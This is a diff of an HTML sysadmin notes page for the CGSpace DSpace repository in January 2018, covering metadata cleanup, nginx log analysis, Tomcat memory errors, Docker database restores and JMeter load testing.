$ ./delete-metadata-values.py -i /tmp/2018-01-15-Affiliations-11-Deletions.csv -f cg.contributor.affiliation -m 211 -d dspace -u dspace -p &#39;fuuu&#39;
</code></pre><ul>
<li>Now I made a new list of affiliations for Peter to look through:</li>
</ul>
<pre><code>dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where metadata_schema_id = 2 and element = 'contributor' and qualifier = 'affiliation') AND resource_type_id = 2 group by text_value order by count desc) to /tmp/affiliations.csv with csv;
<pre tabindex="0"><code>dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where metadata_schema_id = 2 and element = &#39;contributor&#39; and qualifier = &#39;affiliation&#39;) AND resource_type_id = 2 group by text_value order by count desc) to /tmp/affiliations.csv with csv;
COPY 4552
</code></pre><ul>
<li>Looking over the affiliations again I see dozens of CIAT ones with their affiliation formatted like: International Center for Tropical Agriculture (CIAT)</li>
@ -828,11 +828,11 @@ COPY 4552
<li>Help Sisay with some thumbnails for book chapters in Open Refine and SAFBuilder</li>
<li>CGSpace users were having problems logging in, I think something&rsquo;s wrong with LDAP because I see this in the logs:</li>
</ul>
<pre><code>2018-01-15 12:53:15,810 WARN org.dspace.authenticate.LDAPAuthentication @ anonymous:session_id=2386749547D03E0AA4EC7E44181A7552:ip_addr=x.x.x.x:ldap_authentication:type=failed_auth javax.naming.AuthenticationException\colon; [LDAP\colon; error code 49 - 80090308\colon; LdapErr\colon; DSID-0C090400, comment\colon; AcceptSecurityContext error, data 775, v1db1^@]
<pre tabindex="0"><code>2018-01-15 12:53:15,810 WARN org.dspace.authenticate.LDAPAuthentication @ anonymous:session_id=2386749547D03E0AA4EC7E44181A7552:ip_addr=x.x.x.x:ldap_authentication:type=failed_auth javax.naming.AuthenticationException\colon; [LDAP\colon; error code 49 - 80090308\colon; LdapErr\colon; DSID-0C090400, comment\colon; AcceptSecurityContext error, data 775, v1db1^@]
</code></pre><ul>
<li>Looks like we processed 2.9 million requests on CGSpace in 2017-12:</li>
</ul>
<pre><code># time zcat --force /var/log/nginx/* | grep -cE &quot;[0-9]{1,2}/Dec/2017&quot;
<pre tabindex="0"><code># time zcat --force /var/log/nginx/* | grep -cE &#34;[0-9]{1,2}/Dec/2017&#34;
2890041
real 0m25.756s
@ -845,7 +845,7 @@ sys 0m2.210s
<li>Discuss standardized names for CRPs and centers with ICARDA (don&rsquo;t wait for CG Core)</li>
<li>Re-send DC rights implementation and forward to everyone so we can move forward with it (without the URI field for now)</li>
<li>Start looking at where I was with the AGROVOC API</li>
<li>Have a controlled vocabulary for CGIAR authors' names and ORCIDs? Perhaps values like: Orth, Alan S. (0000-0002-1735-7458)</li>
<li>Have a controlled vocabulary for CGIAR authors&rsquo; names and ORCIDs? Perhaps values like: Orth, Alan S. (0000-0002-1735-7458)</li>
<li>Need to find the metadata field name that ICARDA is using for their ORCIDs</li>
<li>Update text for DSpace version plan on wiki</li>
<li>Come up with an SLA, something like: <em>In return for your contribution we will, to the best of our ability, ensure 99.5% (&ldquo;two and a half nines&rdquo;) uptime of CGSpace, ensure data is stored in open formats and safely backed up, follow CG Core metadata standards, &hellip;</em></li>
@ -864,14 +864,14 @@ sys 0m2.210s
<li>Also, there are whitespace issues in many columns, and the items are mapped to the LIVES and ILRI articles collections, not Theses</li>
<li>In any case, importing them like this:</li>
</ul>
<pre><code>$ export JAVA_OPTS=&quot;-Dfile.encoding=UTF-8 -Xmx512m -XX:+TieredCompilation -XX:TieredStopAtLevel=1&quot;
<pre tabindex="0"><code>$ export JAVA_OPTS=&#34;-Dfile.encoding=UTF-8 -Xmx512m -XX:+TieredCompilation -XX:TieredStopAtLevel=1&#34;
$ dspace import -a -e aorth@mjanja.ch -s /tmp/2018-01-16\ LIVES/SimpleArchiveFormat -m lives.map &amp;&gt; lives.log
</code></pre><ul>
<li>And fantastic, before I started the import there were 10 PostgreSQL connections, and then CGSpace crashed during the upload</li>
<li>When I looked there were 210 PostgreSQL connections!</li>
<li>I don&rsquo;t see any high load in XMLUI or REST/OAI:</li>
</ul>
<pre><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E &quot;17/Jan/2018&quot; | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E &#34;17/Jan/2018&#34; | awk &#39;{print $1}&#39; | sort -n | uniq -c | sort -h | tail
381 40.77.167.124
403 213.55.99.121
431 207.46.13.60
@ -882,7 +882,7 @@ $ dspace import -a -e aorth@mjanja.ch -s /tmp/2018-01-16\ LIVES/SimpleArchiveFor
593 54.91.48.104
757 104.196.152.243
776 66.249.66.90
# cat /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E &quot;17/Jan/2018&quot; | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
# cat /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E &#34;17/Jan/2018&#34; | awk &#39;{print $1}&#39; | sort -n | uniq -c | sort -h | tail
11 205.201.132.14
11 40.77.167.124
15 35.226.23.240
@ -896,17 +896,17 @@ $ dspace import -a -e aorth@mjanja.ch -s /tmp/2018-01-16\ LIVES/SimpleArchiveFor
</code></pre><ul>
<li>But I do see this strange message in the dspace log:</li>
</ul>
<pre><code>2018-01-17 07:59:25,856 INFO org.apache.http.impl.client.SystemDefaultHttpClient @ I/O exception (org.apache.http.NoHttpResponseException) caught when processing request to {}-&gt;http://localhost:8081: The target server failed to respond
<pre tabindex="0"><code>2018-01-17 07:59:25,856 INFO org.apache.http.impl.client.SystemDefaultHttpClient @ I/O exception (org.apache.http.NoHttpResponseException) caught when processing request to {}-&gt;http://localhost:8081: The target server failed to respond
2018-01-17 07:59:25,856 INFO org.apache.http.impl.client.SystemDefaultHttpClient @ Retrying request to {}-&gt;http://localhost:8081
</code></pre><ul>
<li>I have NEVER seen this error before, and there is no error before or after that in DSpace&rsquo;s solr.log</li>
<li>Tomcat&rsquo;s catalina.out does show something interesting, though, right at that time:</li>
</ul>
<pre><code>[====================&gt; ]40% time remaining: 7 hour(s) 14 minute(s) 45 seconds. timestamp: 2018-01-17 07:57:02
<pre tabindex="0"><code>[====================&gt; ]40% time remaining: 7 hour(s) 14 minute(s) 45 seconds. timestamp: 2018-01-17 07:57:02
[====================&gt; ]40% time remaining: 7 hour(s) 14 minute(s) 45 seconds. timestamp: 2018-01-17 07:57:11
[====================&gt; ]40% time remaining: 7 hour(s) 14 minute(s) 44 seconds. timestamp: 2018-01-17 07:57:37
[====================&gt; ]40% time remaining: 7 hour(s) 16 minute(s) 5 seconds. timestamp: 2018-01-17 07:57:49
Exception in thread &quot;http-bio-127.0.0.1-8081-exec-627&quot; java.lang.OutOfMemoryError: Java heap space
Exception in thread &#34;http-bio-127.0.0.1-8081-exec-627&#34; java.lang.OutOfMemoryError: Java heap space
at org.apache.lucene.util.FixedBitSet.clone(FixedBitSet.java:576)
at org.apache.solr.search.BitDocSet.andNot(BitDocSet.java:222)
at org.apache.solr.search.SolrIndexSearcher.getProcessedFilter(SolrIndexSearcher.java:1067)
@ -943,7 +943,7 @@ Exception in thread &quot;http-bio-127.0.0.1-8081-exec-627&quot; java.lang.OutOf
<li>You can see the timestamp above, which is some Atmire nightly task I think, but I can&rsquo;t figure out which one</li>
<li>So I restarted Tomcat and tried the import again, which finished very quickly and without errors!</li>
</ul>
<pre><code>$ dspace import -a -e aorth@mjanja.ch -s /tmp/2018-01-16\ LIVES/SimpleArchiveFormat -m lives2.map &amp;&gt; lives2.log
<pre tabindex="0"><code>$ dspace import -a -e aorth@mjanja.ch -s /tmp/2018-01-16\ LIVES/SimpleArchiveFormat -m lives2.map &amp;&gt; lives2.log
</code></pre><ul>
<li>Looking at the JVM graphs from Munin it does look like the heap ran out of memory (see the blue dip just before the green spike when I restarted Tomcat):</li>
</ul>
@ -951,7 +951,7 @@ Exception in thread &quot;http-bio-127.0.0.1-8081-exec-627&quot; java.lang.OutOf
<ul>
<li>I&rsquo;m playing with maven repository caching using Artifactory in a Docker instance: <a href="https://www.jfrog.com/confluence/display/RTF/Installing+with+Docker">https://www.jfrog.com/confluence/display/RTF/Installing+with+Docker</a></li>
</ul>
<pre><code>$ docker pull docker.bintray.io/jfrog/artifactory-oss:latest
<pre tabindex="0"><code>$ docker pull docker.bintray.io/jfrog/artifactory-oss:latest
$ docker volume create --name artifactory5_data
$ docker network create dspace-build
$ docker run --network dspace-build --name artifactory -d -v artifactory5_data:/var/opt/jfrog/artifactory -p 8081:8081 docker.bintray.io/jfrog/artifactory-oss:latest
@ -961,11 +961,11 @@ $ docker run --network dspace-build --name artifactory -d -v artifactory5_data:/
<li>Wow, I even managed to add the Atmire repository as a remote and map it into the <code>libs-release</code> virtual repository, then tell maven to use it for <code>atmire.com-releases</code> in settings.xml!</li>
<li>Hmm, some maven dependencies for the SWORDv2 web application in DSpace 5.5 are broken:</li>
</ul>
<pre><code>[ERROR] Failed to execute goal on project dspace-swordv2: Could not resolve dependencies for project org.dspace:dspace-swordv2:war:5.5: Failed to collect dependencies at org.swordapp:sword2-server:jar:classes:1.0 -&gt; org.apache.abdera:abdera-client:jar:1.1.1 -&gt; org.apache.abdera:abdera-core:jar:1.1.1 -&gt; org.apache.abdera:abdera-i18n:jar:1.1.1 -&gt; org.apache.geronimo.specs:geronimo-activation_1.0.2_spec:jar:1.1: Failed to read artifact descriptor for org.apache.geronimo.specs:geronimo-activation_1.0.2_spec:jar:1.1: Could not find artifact org.apache.geronimo.specs:specs:pom:1.1 in central (http://localhost:8081/artifactory/libs-release) -&gt; [Help 1]
<pre tabindex="0"><code>[ERROR] Failed to execute goal on project dspace-swordv2: Could not resolve dependencies for project org.dspace:dspace-swordv2:war:5.5: Failed to collect dependencies at org.swordapp:sword2-server:jar:classes:1.0 -&gt; org.apache.abdera:abdera-client:jar:1.1.1 -&gt; org.apache.abdera:abdera-core:jar:1.1.1 -&gt; org.apache.abdera:abdera-i18n:jar:1.1.1 -&gt; org.apache.geronimo.specs:geronimo-activation_1.0.2_spec:jar:1.1: Failed to read artifact descriptor for org.apache.geronimo.specs:geronimo-activation_1.0.2_spec:jar:1.1: Could not find artifact org.apache.geronimo.specs:specs:pom:1.1 in central (http://localhost:8081/artifactory/libs-release) -&gt; [Help 1]
</code></pre><ul>
<li>I never noticed because I build with that web application disabled:</li>
</ul>
<pre><code>$ mvn -U -Dmirage2.on=true -Dmirage2.deps.included=false -Denv=localhost -P \!dspace-sword,\!dspace-swordv2 clean package
<pre tabindex="0"><code>$ mvn -U -Dmirage2.on=true -Dmirage2.deps.included=false -Denv=localhost -P \!dspace-sword,\!dspace-swordv2 clean package
</code></pre><ul>
<li>UptimeRobot said CGSpace went down for a few minutes</li>
<li>I didn&rsquo;t do anything but it came back up on its own</li>
@ -973,7 +973,7 @@ $ docker run --network dspace-build --name artifactory -d -v artifactory5_data:/
<li>Now Linode alert says the CPU load is high, <em>sigh</em></li>
<li>Regarding the heap space error earlier today, it looks like it does happen a few times a week or month (I&rsquo;m not sure how far these logs go back, as they are not strictly daily):</li>
</ul>
<pre><code># zgrep -c java.lang.OutOfMemoryError /var/log/tomcat7/catalina.out* | grep -v :0
<pre tabindex="0"><code># zgrep -c java.lang.OutOfMemoryError /var/log/tomcat7/catalina.out* | grep -v :0
/var/log/tomcat7/catalina.out:2
/var/log/tomcat7/catalina.out.10.gz:7
/var/log/tomcat7/catalina.out.11.gz:1
@ -1004,7 +1004,7 @@ $ docker run --network dspace-build --name artifactory -d -v artifactory5_data:/
<li>I don&rsquo;t see any errors in the nginx or catalina logs, so I guess UptimeRobot just got impatient and closed the request, which caused nginx to send an HTTP 499</li>
<li>I realize I never did a full re-index after the SQL author and affiliation updates last week, so I should force one now:</li>
</ul>
<pre><code>$ export JAVA_OPTS=&quot;-Dfile.encoding=UTF-8 -Xmx1024m -XX:+TieredCompilation -XX:TieredStopAtLevel=1&quot;
<pre tabindex="0"><code>$ export JAVA_OPTS=&#34;-Dfile.encoding=UTF-8 -Xmx1024m -XX:+TieredCompilation -XX:TieredStopAtLevel=1&#34;
$ time schedtool -D -e ionice -c2 -n7 nice -n19 /home/cgspace.cgiar.org/bin/dspace index-discovery -b
</code></pre><ul>
<li>Maria from Bioversity asked if I could remove the abstracts from all of their Limited Access items in the <a href="https://cgspace.cgiar.org/handle/10568/35501">Bioversity Journal Articles</a> collection</li>
@ -1012,7 +1012,7 @@ $ time schedtool -D -e ionice -c2 -n7 nice -n19 /home/cgspace.cgiar.org/bin/dspa
<li>Use this GREL in OpenRefine after isolating all the Limited Access items: <code>value.startsWith(&quot;10568/35501&quot;)</code></li>
<li>UptimeRobot said CGSpace went down AGAIN and both Sisay and Danny immediately logged in and restarted Tomcat without talking to me <em>or</em> each other!</li>
</ul>
<pre><code>Jan 18 07:01:22 linode18 sudo[10805]: dhmichael : TTY=pts/5 ; PWD=/home/dhmichael ; USER=root ; COMMAND=/bin/systemctl restart tomcat7
<pre tabindex="0"><code>Jan 18 07:01:22 linode18 sudo[10805]: dhmichael : TTY=pts/5 ; PWD=/home/dhmichael ; USER=root ; COMMAND=/bin/systemctl restart tomcat7
Jan 18 07:01:22 linode18 sudo[10805]: pam_unix(sudo:session): session opened for user root by dhmichael(uid=0)
Jan 18 07:01:22 linode18 systemd[1]: Stopping LSB: Start Tomcat....
Jan 18 07:01:22 linode18 sudo[10812]: swebshet : TTY=pts/3 ; PWD=/home/swebshet ; USER=root ; COMMAND=/bin/systemctl restart tomcat7
@ -1026,14 +1026,14 @@ Jan 18 07:01:22 linode18 sudo[10812]: pam_unix(sudo:session): session opened for
<li>Linode alerted and said that the CPU load was 264.1% on CGSpace</li>
<li>Start the Discovery indexing again:</li>
</ul>
<pre><code>$ export JAVA_OPTS=&quot;-Dfile.encoding=UTF-8 -Xmx1024m -XX:+TieredCompilation -XX:TieredStopAtLevel=1&quot;
<pre tabindex="0"><code>$ export JAVA_OPTS=&#34;-Dfile.encoding=UTF-8 -Xmx1024m -XX:+TieredCompilation -XX:TieredStopAtLevel=1&#34;
$ time schedtool -D -e ionice -c2 -n7 nice -n19 /home/cgspace.cgiar.org/bin/dspace index-discovery -b
</code></pre><ul>
<li>Linode alerted again and said that CGSpace was using 301% CPU</li>
<li>Peter emailed to ask why <a href="https://cgspace.cgiar.org/handle/10568/88090">this item</a> doesn&rsquo;t have an Altmetric badge on CGSpace but does have one on the <a href="https://www.altmetric.com/details/26709041">Altmetric dashboard</a></li>
<li>Looks like our badge code calls the <code>handle</code> endpoint which doesn&rsquo;t exist:</li>
</ul>
<pre><code>https://api.altmetric.com/v1/handle/10568/88090
<pre tabindex="0"><code>https://api.altmetric.com/v1/handle/10568/88090
</code></pre><ul>
<li>I told Peter we should keep an eye out and try again next week</li>
</ul>
@ -1041,7 +1041,7 @@ $ time schedtool -D -e ionice -c2 -n7 nice -n19 /home/cgspace.cgiar.org/bin/dspa
<ul>
<li>Run the authority indexing script on CGSpace and of course it died:</li>
</ul>
<pre><code>$ time schedtool -D -e ionice -c2 -n7 nice -n19 /home/cgspace.cgiar.org/bin/dspace index-authority
<pre tabindex="0"><code>$ time schedtool -D -e ionice -c2 -n7 nice -n19 /home/cgspace.cgiar.org/bin/dspace index-authority
Retrieving all data
Initialize org.dspace.authority.indexer.DSpaceAuthorityIndexer
Exception: null
@ -1071,12 +1071,12 @@ sys 0m12.317s
<li>In the end there were 324 items in the collection that were Limited Access, but only 199 had abstracts</li>
<li>I want to document the workflow of adding a production PostgreSQL database to a development instance of <a href="https://github.com/alanorth/docker-dspace">DSpace in Docker</a>:</li>
</ul>
<pre><code>$ docker exec dspace_db dropdb -U postgres dspace
<pre tabindex="0"><code>$ docker exec dspace_db dropdb -U postgres dspace
$ docker exec dspace_db createdb -U postgres -O dspace --encoding=UNICODE dspace
$ docker exec dspace_db psql -U postgres dspace -c 'alter user dspace createuser;'
$ docker exec dspace_db psql -U postgres dspace -c &#39;alter user dspace createuser;&#39;
$ docker cp test.dump dspace_db:/tmp/test.dump
$ docker exec dspace_db pg_restore -U postgres -d dspace /tmp/test.dump
$ docker exec dspace_db psql -U postgres dspace -c 'alter user dspace nocreateuser;'
$ docker exec dspace_db psql -U postgres dspace -c &#39;alter user dspace nocreateuser;&#39;
$ docker exec dspace_db vacuumdb -U postgres dspace
$ docker cp ~/src/git/DSpace/dspace/etc/postgres/update-sequences.sql dspace_db:/tmp
$ docker exec dspace_db psql -U dspace -f /tmp/update-sequences.sql dspace
@ -1099,7 +1099,7 @@ $ docker exec dspace_db psql -U dspace -f /tmp/update-sequences.sql dspace
<li>The source code is here: <a href="https://gist.github.com/alanorth/ddd7f555f0e487fe0e9d3eb4ff26ce50">rest-find-collections.py</a></li>
<li>Peter had said that found a bunch of ILRI collections that were called &ldquo;untitled&rdquo;, but I don&rsquo;t see any:</li>
</ul>
<pre><code>$ ./rest-find-collections.py 10568/1 | wc -l
<pre tabindex="0"><code>$ ./rest-find-collections.py 10568/1 | wc -l
308
$ ./rest-find-collections.py 10568/1 | grep -i untitled
</code></pre><ul>
@ -1119,12 +1119,12 @@ $ ./rest-find-collections.py 10568/1 | grep -i untitled
<li>Thinking about generating a jmeter test plan for DSpace, along the lines of <a href="https://github.com/Georgetown-University-Libraries/dspace-performance-test">Georgetown&rsquo;s dspace-performance-test</a></li>
<li>I got a list of all the GET requests on CGSpace for January 21st (the last time Linode complained the load was high), excluding admin calls:</li>
</ul>
<pre><code># zcat --force /var/log/nginx/access.log.2.gz /var/log/nginx/access.log.3.gz /var/log/nginx/library-access.log.2.gz /var/log/nginx/library-access.log.3.gz /var/log/nginx/rest.log.2.gz /var/log/nginx/rest.log.3.gz /var/log/nginx/oai.log.2.gz /var/log/nginx/oai.log.3.gz /var/log/nginx/error.log.2.gz /var/log/nginx/error.log.3.gz | grep &quot;21/Jan/2018&quot; | grep &quot;GET &quot; | grep -c -v &quot;/admin&quot;
<pre tabindex="0"><code># zcat --force /var/log/nginx/access.log.2.gz /var/log/nginx/access.log.3.gz /var/log/nginx/library-access.log.2.gz /var/log/nginx/library-access.log.3.gz /var/log/nginx/rest.log.2.gz /var/log/nginx/rest.log.3.gz /var/log/nginx/oai.log.2.gz /var/log/nginx/oai.log.3.gz /var/log/nginx/error.log.2.gz /var/log/nginx/error.log.3.gz | grep &#34;21/Jan/2018&#34; | grep &#34;GET &#34; | grep -c -v &#34;/admin&#34;
56405
</code></pre><ul>
<li>Apparently about 28% of these requests were for bitstreams, 30% for the REST API, and 30% for handles:</li>
</ul>
<pre><code># zcat --force /var/log/nginx/access.log.2.gz /var/log/nginx/access.log.3.gz /var/log/nginx/library-access.log.2.gz /var/log/nginx/library-access.log.3.gz /var/log/nginx/rest.log.2.gz /var/log/nginx/rest.log.3.gz /var/log/nginx/oai.log.2.gz /var/log/nginx/oai.log.3.gz /var/log/nginx/error.log.2.gz /var/log/nginx/error.log.3.gz | grep &quot;21/Jan/2018&quot; | grep &quot;GET &quot; | grep -v &quot;/admin&quot; | awk '{print $7}' | grep -Eo &quot;^/(handle|bitstream|rest|oai)/&quot; | sort | uniq -c | sort -n
<pre tabindex="0"><code># zcat --force /var/log/nginx/access.log.2.gz /var/log/nginx/access.log.3.gz /var/log/nginx/library-access.log.2.gz /var/log/nginx/library-access.log.3.gz /var/log/nginx/rest.log.2.gz /var/log/nginx/rest.log.3.gz /var/log/nginx/oai.log.2.gz /var/log/nginx/oai.log.3.gz /var/log/nginx/error.log.2.gz /var/log/nginx/error.log.3.gz | grep &#34;21/Jan/2018&#34; | grep &#34;GET &#34; | grep -v &#34;/admin&#34; | awk &#39;{print $7}&#39; | grep -Eo &#34;^/(handle|bitstream|rest|oai)/&#34; | sort | uniq -c | sort -n
38 /oai/
14406 /bitstream/
15179 /rest/
@ -1132,14 +1132,14 @@ $ ./rest-find-collections.py 10568/1 | grep -i untitled
</code></pre><ul>
<li>And 3% were to the homepage or search:</li>
</ul>
<pre><code># zcat --force /var/log/nginx/access.log.2.gz /var/log/nginx/access.log.3.gz /var/log/nginx/library-access.log.2.gz /var/log/nginx/library-access.log.3.gz /var/log/nginx/rest.log.2.gz /var/log/nginx/rest.log.3.gz /var/log/nginx/oai.log.2.gz /var/log/nginx/oai.log.3.gz /var/log/nginx/error.log.2.gz /var/log/nginx/error.log.3.gz | grep &quot;21/Jan/2018&quot; | grep &quot;GET &quot; | grep -v &quot;/admin&quot; | awk '{print $7}' | grep -Eo '^/($|open-search|discover)' | sort | uniq -c
<pre tabindex="0"><code># zcat --force /var/log/nginx/access.log.2.gz /var/log/nginx/access.log.3.gz /var/log/nginx/library-access.log.2.gz /var/log/nginx/library-access.log.3.gz /var/log/nginx/rest.log.2.gz /var/log/nginx/rest.log.3.gz /var/log/nginx/oai.log.2.gz /var/log/nginx/oai.log.3.gz /var/log/nginx/error.log.2.gz /var/log/nginx/error.log.3.gz | grep &#34;21/Jan/2018&#34; | grep &#34;GET &#34; | grep -v &#34;/admin&#34; | awk &#39;{print $7}&#39; | grep -Eo &#39;^/($|open-search|discover)&#39; | sort | uniq -c
1050 /
413 /discover
170 /open-search
</code></pre><ul>
<li>The last 10% or so seem to be for static assets that would be served by nginx anyways:</li>
</ul>
<pre><code># zcat --force /var/log/nginx/access.log.2.gz /var/log/nginx/access.log.3.gz /var/log/nginx/library-access.log.2.gz /var/log/nginx/library-access.log.3.gz /var/log/nginx/rest.log.2.gz /var/log/nginx/rest.log.3.gz /var/log/nginx/oai.log.2.gz /var/log/nginx/oai.log.3.gz /var/log/nginx/error.log.2.gz /var/log/nginx/error.log.3.gz | grep &quot;21/Jan/2018&quot; | grep &quot;GET &quot; | grep -v &quot;/admin&quot; | awk '{print $7}' | grep -v bitstream | grep -Eo '\.(js|css|png|jpg|jpeg|php|svg|gif|txt|map)$' | sort | uniq -c | sort -n
<pre tabindex="0"><code># zcat --force /var/log/nginx/access.log.2.gz /var/log/nginx/access.log.3.gz /var/log/nginx/library-access.log.2.gz /var/log/nginx/library-access.log.3.gz /var/log/nginx/rest.log.2.gz /var/log/nginx/rest.log.3.gz /var/log/nginx/oai.log.2.gz /var/log/nginx/oai.log.3.gz /var/log/nginx/error.log.2.gz /var/log/nginx/error.log.3.gz | grep &#34;21/Jan/2018&#34; | grep &#34;GET &#34; | grep -v &#34;/admin&#34; | awk &#39;{print $7}&#39; | grep -v bitstream | grep -Eo &#39;\.(js|css|png|jpg|jpeg|php|svg|gif|txt|map)$&#39; | sort | uniq -c | sort -n
2 .gif
7 .css
84 .js
@ -1153,7 +1153,7 @@ $ ./rest-find-collections.py 10568/1 | grep -i untitled
<ul>
<li>Looking at the REST requests, most of them are to expand all or metadata, but 5% are for retrieving bitstreams:</li>
</ul>
<pre><code># zcat --force /var/log/nginx/access.log.3.gz /var/log/nginx/access.log.4.gz /var/log/nginx/library-access.log.3.gz /var/log/nginx/library-access.log.4.gz /var/log/nginx/rest.log.3.gz /var/log/nginx/rest.log.4.gz /var/log/nginx/oai.log.3.gz /var/log/nginx/oai.log.4.gz /var/log/nginx/error.log.3.gz /var/log/nginx/error.log.4.gz | grep &quot;21/Jan/2018&quot; | grep &quot;GET &quot; | grep -v &quot;/admin&quot; | awk '{print $7}' | grep -E &quot;^/rest&quot; | grep -Eo &quot;(retrieve|expand=[a-z].*)&quot; | sort | uniq -c | sort -n
<pre tabindex="0"><code># zcat --force /var/log/nginx/access.log.3.gz /var/log/nginx/access.log.4.gz /var/log/nginx/library-access.log.3.gz /var/log/nginx/library-access.log.4.gz /var/log/nginx/rest.log.3.gz /var/log/nginx/rest.log.4.gz /var/log/nginx/oai.log.3.gz /var/log/nginx/oai.log.4.gz /var/log/nginx/error.log.3.gz /var/log/nginx/error.log.4.gz | grep &#34;21/Jan/2018&#34; | grep &#34;GET &#34; | grep -v &#34;/admin&#34; | awk &#39;{print $7}&#39; | grep -E &#34;^/rest&#34; | grep -Eo &#34;(retrieve|expand=[a-z].*)&#34; | sort | uniq -c | sort -n
1 expand=collections
16 expand=all&amp;limit=1
45 expand=items
@ -1163,12 +1163,12 @@ $ ./rest-find-collections.py 10568/1 | grep -i untitled
</code></pre><ul>
<li>I finished creating the test plan for DSpace Test and ran it from my Linode with:</li>
</ul>
<pre><code>$ jmeter -n -t DSpacePerfTest-dspacetest.cgiar.org.jmx -l 2018-01-24-1.jtl
<pre tabindex="0"><code>$ jmeter -n -t DSpacePerfTest-dspacetest.cgiar.org.jmx -l 2018-01-24-1.jtl
</code></pre><ul>
<li>Atmire responded to <a href="https://tracker.atmire.com/tickets-cgiar-ilri/view-ticket?id=560">my issue from two weeks ago</a> and said they will start looking into DSpace 5.8 compatibility for CGSpace</li>
<li>I set up a new Arch Linux Linode instance with 8192 MB of RAM and ran the test plan a few times to get a baseline:</li>
</ul>
<pre><code># lscpu
<pre tabindex="0"><code># lscpu
# lscpu
Architecture: x86_64
CPU op-mode(s): 32-bit, 64-bit
@ -1212,19 +1212,19 @@ $ ./jmeter -n -t ~/dspace-performance-test/DSpacePerfTest-dspacetest.cgiar.org.j
</code></pre><ul>
<li>Then I generated reports for these runs like this:</li>
</ul>
<pre><code>$ jmeter -g 2018-01-24-linode5451120-baseline.jtl -o 2018-01-24-linode5451120-baseline
<pre tabindex="0"><code>$ jmeter -g 2018-01-24-linode5451120-baseline.jtl -o 2018-01-24-linode5451120-baseline
</code></pre><h2 id="2018-01-25">2018-01-25</h2>
<ul>
<li>Run another round of tests on DSpace Test with jmeter after changing Tomcat&rsquo;s <code>minSpareThreads</code> to 20 (default is 10) and <code>acceptorThreadCount</code> to 2 (default is 1):</li>
</ul>
<pre><code>$ ./jmeter -n -t ~/dspace-performance-test/DSpacePerfTest-dspacetest.cgiar.org.jmx -l ~/dspace-performance-test/2018-01-25-linode5451120-tomcat-threads.jtl -j ~/dspace-performance-test/2018-01-25-linode5451120-tomcat-threads.log
<pre tabindex="0"><code>$ ./jmeter -n -t ~/dspace-performance-test/DSpacePerfTest-dspacetest.cgiar.org.jmx -l ~/dspace-performance-test/2018-01-25-linode5451120-tomcat-threads.jtl -j ~/dspace-performance-test/2018-01-25-linode5451120-tomcat-threads.log
$ ./jmeter -n -t ~/dspace-performance-test/DSpacePerfTest-dspacetest.cgiar.org.jmx -l ~/dspace-performance-test/2018-01-25-linode5451120-tomcat-threads2.jtl -j ~/dspace-performance-test/2018-01-25-linode5451120-tomcat-threads2.log
$ ./jmeter -n -t ~/dspace-performance-test/DSpacePerfTest-dspacetest.cgiar.org.jmx -l ~/dspace-performance-test/2018-01-25-linode5451120-tomcat-threads3.jtl -j ~/dspace-performance-test/2018-01-25-linode5451120-tomcat-threads3.log
</code></pre><ul>
<li>I changed the parameters back to the baseline ones and switched the Tomcat JVM garbage collector to G1GC and re-ran the tests</li>
<li>JVM options for Tomcat changed from <code>-Xms3072m -Xmx3072m -XX:+UseConcMarkSweepGC</code> to <code>-Xms3072m -Xmx3072m -XX:+UseG1GC -XX:+PerfDisableSharedMem</code></li>
</ul>
<pre><code>$ ./jmeter -n -t ~/dspace-performance-test/DSpacePerfTest-dspacetest.cgiar.org.jmx -l ~/dspace-performance-test/2018-01-25-linode5451120-g1gc.jtl -j ~/dspace-performance-test/2018-01-25-linode5451120-g1gc.log
<pre tabindex="0"><code>$ ./jmeter -n -t ~/dspace-performance-test/DSpacePerfTest-dspacetest.cgiar.org.jmx -l ~/dspace-performance-test/2018-01-25-linode5451120-g1gc.jtl -j ~/dspace-performance-test/2018-01-25-linode5451120-g1gc.log
$ ./jmeter -n -t ~/dspace-performance-test/DSpacePerfTest-dspacetest.cgiar.org.jmx -l ~/dspace-performance-test/2018-01-25-linode5451120-g1gc2.jtl -j ~/dspace-performance-test/2018-01-25-linode5451120-g1gc2.log
$ ./jmeter -n -t ~/dspace-performance-test/DSpacePerfTest-dspacetest.cgiar.org.jmx -l ~/dspace-performance-test/2018-01-25-linode5451120-g1gc3.jtl -j ~/dspace-performance-test/2018-01-25-linode5451120-g1gc3.log
</code></pre><ul>
@ -1242,7 +1242,7 @@ $ ./jmeter -n -t ~/dspace-performance-test/DSpacePerfTest-dspacetest.cgiar.org.j
<li>The problem is that Peter wanted to use two questions, one for CG centers and one for other, but using the same metadata value, which isn&rsquo;t possible (?)</li>
<li>So I used some creativity and made several fields display values, but not store any, ie:</li>
</ul>
<pre><code>&lt;pair&gt;
<pre tabindex="0"><code>&lt;pair&gt;
&lt;displayed-value&gt;For products published by another party:&lt;/displayed-value&gt;
&lt;stored-value&gt;&lt;/stored-value&gt;
&lt;/pair&gt;
@ -1267,16 +1267,16 @@ $ ./jmeter -n -t ~/dspace-performance-test/DSpacePerfTest-dspacetest.cgiar.org.j
<li>CGSpace went down this morning for a few minutes, according to UptimeRobot</li>
<li>Looking at the DSpace logs I see this error happened just before UptimeRobot noticed it going down:</li>
</ul>
<pre><code>2018-01-29 05:30:22,226 INFO org.dspace.usage.LoggerUsageEventListener @ anonymous:session_id=3775D4125D28EF0C691B08345D905141:ip_addr=68.180.229.254:view_item:handle=10568/71890
2018-01-29 05:30:22,322 ERROR org.dspace.app.xmlui.aspect.discovery.AbstractSearch @ org.apache.solr.search.SyntaxError: Cannot parse 'dateIssued_keyword:[1994+TO+1999]': Encountered &quot; &quot;]&quot; &quot;] &quot;&quot; at line 1, column 32.
